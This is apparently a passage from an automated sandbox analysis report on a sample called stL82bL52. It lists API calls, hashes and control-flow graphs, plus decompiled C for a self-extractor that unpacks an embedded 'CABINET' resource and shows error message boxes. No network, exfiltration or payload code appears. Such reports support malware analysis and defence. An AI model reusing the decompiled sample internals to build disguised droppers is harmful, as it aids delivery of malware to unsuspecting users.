                                                                                                                                                                                                        0x001f5c04
                                                                                                                                                                                                        0x001f5a27
                                                                                                                                                                                                        0x001f5a3a
                                                                                                                                                                                                        0x001f5a46
                                                                                                                                                                                                        0x001f5a48
                                                                                                                                                                                                        0x001f5a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5a64
                                                                                                                                                                                                        0x001f5a6a
                                                                                                                                                                                                        0x001f5a6c
                                                                                                                                                                                                        0x001f5abc
                                                                                                                                                                                                        0x001f5ac2
                                                                                                                                                                                                        0x001f5ac9
                                                                                                                                                                                                        0x001f5aca
                                                                                                                                                                                                        0x001f5aca
                                                                                                                                                                                                        0x001f5acc
                                                                                                                                                                                                        0x001f5acc
                                                                                                                                                                                                        0x001f5acf
                                                                                                                                                                                                        0x001f5ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5ad3
                                                                                                                                                                                                        0x001f5ad6
                                                                                                                                                                                                        0x001f5ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5ada
                                                                                                                                                                                                        0x001f5adc
                                                                                                                                                                                                        0x001f5add
                                                                                                                                                                                                        0x001f5add
                                                                                                                                                                                                        0x001f5ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5ae0
                                                                                                                                                                                                        0x001f5ae2
                                                                                                                                                                                                        0x001f5ae4
                                                                                                                                                                                                        0x001f5ae6
                                                                                                                                                                                                        0x001f5ae6
                                                                                                                                                                                                        0x001f5ae6
                                                                                                                                                                                                        0x001f5ae9
                                                                                                                                                                                                        0x001f5aeb
                                                                                                                                                                                                        0x001f5af0
                                                                                                                                                                                                        0x001f5af6
                                                                                                                                                                                                        0x001f5af8
                                                                                                                                                                                                        0x001f5af9
                                                                                                                                                                                                        0x001f5af9
                                                                                                                                                                                                        0x001f5afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5afd
                                                                                                                                                                                                        0x001f5aff
                                                                                                                                                                                                        0x001f5b00
                                                                                                                                                                                                        0x001f5b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5b03
                                                                                                                                                                                                        0x001f5b05
                                                                                                                                                                                                        0x001f5b08
                                                                                                                                                                                                        0x001f5b20
                                                                                                                                                                                                        0x001f5b27
                                                                                                                                                                                                        0x001f5b52
                                                                                                                                                                                                        0x001f5b52
                                                                                                                                                                                                        0x001f5b5b
                                                                                                                                                                                                        0x001f5b62
                                                                                                                                                                                                        0x001f5b6b
                                                                                                                                                                                                        0x001f5b6d
                                                                                                                                                                                                        0x001f5b76
                                                                                                                                                                                                        0x001f5b7d
                                                                                                                                                                                                        0x001f5b83
                                                                                                                                                                                                        0x001f5b7f
                                                                                                                                                                                                        0x001f5b7f
                                                                                                                                                                                                        0x001f5b7f
                                                                                                                                                                                                        0x001f5b6f
                                                                                                                                                                                                        0x001f5b72
                                                                                                                                                                                                        0x001f5b72
                                                                                                                                                                                                        0x001f5b85
                                                                                                                                                                                                        0x001f5b98
                                                                                                                                                                                                        0x001f5b9e
                                                                                                                                                                                                        0x001f5b87
                                                                                                                                                                                                        0x001f5b8f
                                                                                                                                                                                                        0x001f5b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5b85
                                                                                                                                                                                                        0x001f5b29
                                                                                                                                                                                                        0x001f5b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5b35
                                                                                                                                                                                                        0x001f5b48
                                                                                                                                                                                                        0x001f5b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5b4a
                                                                                                                                                                                                        0x001f5b0f
                                                                                                                                                                                                        0x001f5b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5b16
                                                                                                                                                                                                        0x001f5a7c
                                                                                                                                                                                                        0x001f5a8a
                                                                                                                                                                                                        0x001f5aa5
                                                                                                                                                                                                        0x001f5aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f59bb
                                                                                                                                                                                                        0x001f59c0
                                                                                                                                                                                                        0x001f59c7
                                                                                                                                                                                                        0x001f59d1
                                                                                                                                                                                                        0x001f59d6
                                                                                                                                                                                                        0x001f5c05
                                                                                                                                                                                                        0x001f5c14
                                                                                                                                                                                                        0x001f5c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001F59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 001F59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 001F5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 001F5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001F5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001F5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 001F5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 001F5BFC
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: c97e5b7f6b8ee9df9c045044623290bf22bc2c0eebca2f2ac1b39ad34bcabc2b
                                                                                                                                                                                                        • Instruction ID: 8d7f30e94c070faf6b2c0d75cad2e2aecefaf72a92aa4cc4ca6545f8fe889b3f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c97e5b7f6b8ee9df9c045044623290bf22bc2c0eebca2f2ac1b39ad34bcabc2b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B7190B190060CAFEB15DB60DC85FFB77AEEB48344F5440AAF64AD6580DB749E85CB20
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 1f4fe0-1f501a call 1f468f FindResourceA LoadResource LockResource 377 1f5161-1f5163 374->377 378 1f5020-1f5027 374->378 379 1f5029-1f5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 1f5057-1f505e call 1f4efd 378->380 379->380 383 1f507c-1f50b4 380->383 384 1f5060-1f5077 call 1f44b9 380->384 389 1f50e8-1f5104 call 1f44b9 383->389 390 1f50b6-1f50da 383->390 388 1f5107-1f510e 384->388 392 1f511d-1f511f 388->392 393 1f5110-1f5117 FreeResource 388->393 402 1f5106 389->402 401 1f50dc 390->401 390->402 394 1f513a-1f5141 392->394 395 1f5121-1f5127 392->395 393->392 399 1f515f 394->399 400 1f5143-1f514a 394->400 395->394 398 1f5129-1f5135 call 1f44b9 395->398 398->394 399->377 400->399 404 1f514c-1f5159 SendMessageA 400->404 405 1f50e3-1f50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E001F4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0x1f9144 = E001F468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0x1f9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0x1f8584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E001F4EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E001F4CA0, E001F4CC0, E001F4980, E001F4A50, E001F4AD0, E001F4B60, E001F4BC0, 1, 0x1f9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0x1f9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        						E001F44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0x1f1140, 0, E001F4CD0, 0, 0x1f9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        					E001F44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0x1f9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0x1f9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0x1f91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E001F44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0x1f8a38 & 0x00000001) == 0 && ( *0x1f9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0x1f8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x001f4fe0
                                                                                                                                                                                                        0x001f4fe6
                                                                                                                                                                                                        0x001f4ff9
                                                                                                                                                                                                        0x001f500d
                                                                                                                                                                                                        0x001f5013
                                                                                                                                                                                                        0x001f501a
                                                                                                                                                                                                        0x001f5163
                                                                                                                                                                                                        0x001f5163
                                                                                                                                                                                                        0x001f5020
                                                                                                                                                                                                        0x001f5027
                                                                                                                                                                                                        0x001f5037
                                                                                                                                                                                                        0x001f5051
                                                                                                                                                                                                        0x001f5051
                                                                                                                                                                                                        0x001f5057
                                                                                                                                                                                                        0x001f505e
                                                                                                                                                                                                        0x001f50a7
                                                                                                                                                                                                        0x001f50ad
                                                                                                                                                                                                        0x001f50b4
                                                                                                                                                                                                        0x001f50e8
                                                                                                                                                                                                        0x001f50e8
                                                                                                                                                                                                        0x001f50ee
                                                                                                                                                                                                        0x001f50ff
                                                                                                                                                                                                        0x001f5104
                                                                                                                                                                                                        0x001f5106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5106
                                                                                                                                                                                                        0x001f50cd
                                                                                                                                                                                                        0x001f50d3
                                                                                                                                                                                                        0x001f50da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f50dd
                                                                                                                                                                                                        0x001f50e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5060
                                                                                                                                                                                                        0x001f5060
                                                                                                                                                                                                        0x001f5070
                                                                                                                                                                                                        0x001f5075
                                                                                                                                                                                                        0x001f5107
                                                                                                                                                                                                        0x001f5107
                                                                                                                                                                                                        0x001f510e
                                                                                                                                                                                                        0x001f5111
                                                                                                                                                                                                        0x001f5117
                                                                                                                                                                                                        0x001f5117
                                                                                                                                                                                                        0x001f511f
                                                                                                                                                                                                        0x001f5121
                                                                                                                                                                                                        0x001f5127
                                                                                                                                                                                                        0x001f5135
                                                                                                                                                                                                        0x001f5135
                                                                                                                                                                                                        0x001f5127
                                                                                                                                                                                                        0x001f5141
                                                                                                                                                                                                        0x001f5159
                                                                                                                                                                                                        0x001f5159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 001F4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 001F5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 001F500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 001F5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 001F5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 001F504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 001F5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 001F5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 001F5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 3407e652b029c0585d8b29ebaebdcdaeef9fc01e0b8dafac6a4a41ae842c0fcc
                                                                                                                                                                                                        • Instruction ID: 83771300750df001a8a5a1bd0855a555b0e166c4b2e0563755b8bc3f19dadb0f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3407e652b029c0585d8b29ebaebdcdaeef9fc01e0b8dafac6a4a41ae842c0fcc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5931E8F07447097FE7206B65AD89F77365DBB44755F040024FB09A29A1DFB99C80C664
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 1f44b9-1f44f8 407 1f44fe-1f4525 LoadStringA 406->407 408 1f4679-1f467b 406->408 409 1f4527-1f452e call 1f681f 407->409 410 1f4562-1f4568 407->410 411 1f467c-1f468c call 1f6ce0 408->411 418 1f453f 409->418 419 1f4530-1f453d call 1f67c9 409->419 414 1f456b-1f4570 410->414 414->414 417 1f4572-1f457c 414->417 420 1f457e-1f4580 417->420 421 1f45c9-1f45cb 417->421 425 1f4544-1f4554 MessageBoxA 418->425 419->418 419->425 426 1f4583-1f4588 420->426 423 1f45cd-1f45cf 421->423 424 1f4607-1f4617 LocalAlloc 421->424 428 1f45d2-1f45d7 423->428 429 1f455a-1f455d 424->429 430 1f461d-1f4628 call 1f1680 424->430 425->429 426->426 431 1f458a-1f458c 426->431 428->428 432 1f45d9-1f45ed LocalAlloc 428->432 429->411 437 1f462d-1f463d MessageBeep call 1f681f 430->437 434 1f458f-1f4594 431->434 432->429 436 1f45f3-1f4605 call 1f171e 432->436 434->434 435 1f4596-1f45ad LocalAlloc 434->435 435->429 438 1f45af-1f45c7 call 1f171e 435->438 436->437 444 1f463f-1f464c call 1f67c9 437->444 445 1f464e 437->445 438->437 444->445 448 1f4653-1f4677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0x1f8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0x1f9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E001F1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E001F171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E001F681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E001F67C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E001F681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E001F67C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x001f44b9
                                                                                                                                                                                                        0x001f44c4
                                                                                                                                                                                                        0x001f44cb
                                                                                                                                                                                                        0x001f44d8
                                                                                                                                                                                                        0x001f44e4
                                                                                                                                                                                                        0x001f44eb
                                                                                                                                                                                                        0x001f44ee
                                                                                                                                                                                                        0x001f44ef
                                                                                                                                                                                                        0x001f44ef
                                                                                                                                                                                                        0x001f44f1
                                                                                                                                                                                                        0x001f44f7
                                                                                                                                                                                                        0x001f44f8
                                                                                                                                                                                                        0x001f467b
                                                                                                                                                                                                        0x001f44fe
                                                                                                                                                                                                        0x001f4509
                                                                                                                                                                                                        0x001f4518
                                                                                                                                                                                                        0x001f4525
                                                                                                                                                                                                        0x001f4562
                                                                                                                                                                                                        0x001f4568
                                                                                                                                                                                                        0x001f4568
                                                                                                                                                                                                        0x001f456b
                                                                                                                                                                                                        0x001f456b
                                                                                                                                                                                                        0x001f456d
                                                                                                                                                                                                        0x001f456e
                                                                                                                                                                                                        0x001f4572
                                                                                                                                                                                                        0x001f4578
                                                                                                                                                                                                        0x001f457c
                                                                                                                                                                                                        0x001f45cb
                                                                                                                                                                                                        0x001f4607
                                                                                                                                                                                                        0x001f4607
                                                                                                                                                                                                        0x001f460d
                                                                                                                                                                                                        0x001f4613
                                                                                                                                                                                                        0x001f4617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f461d
                                                                                                                                                                                                        0x001f4623
                                                                                                                                                                                                        0x001f4626
                                                                                                                                                                                                        0x001f4628
                                                                                                                                                                                                        0x00000000
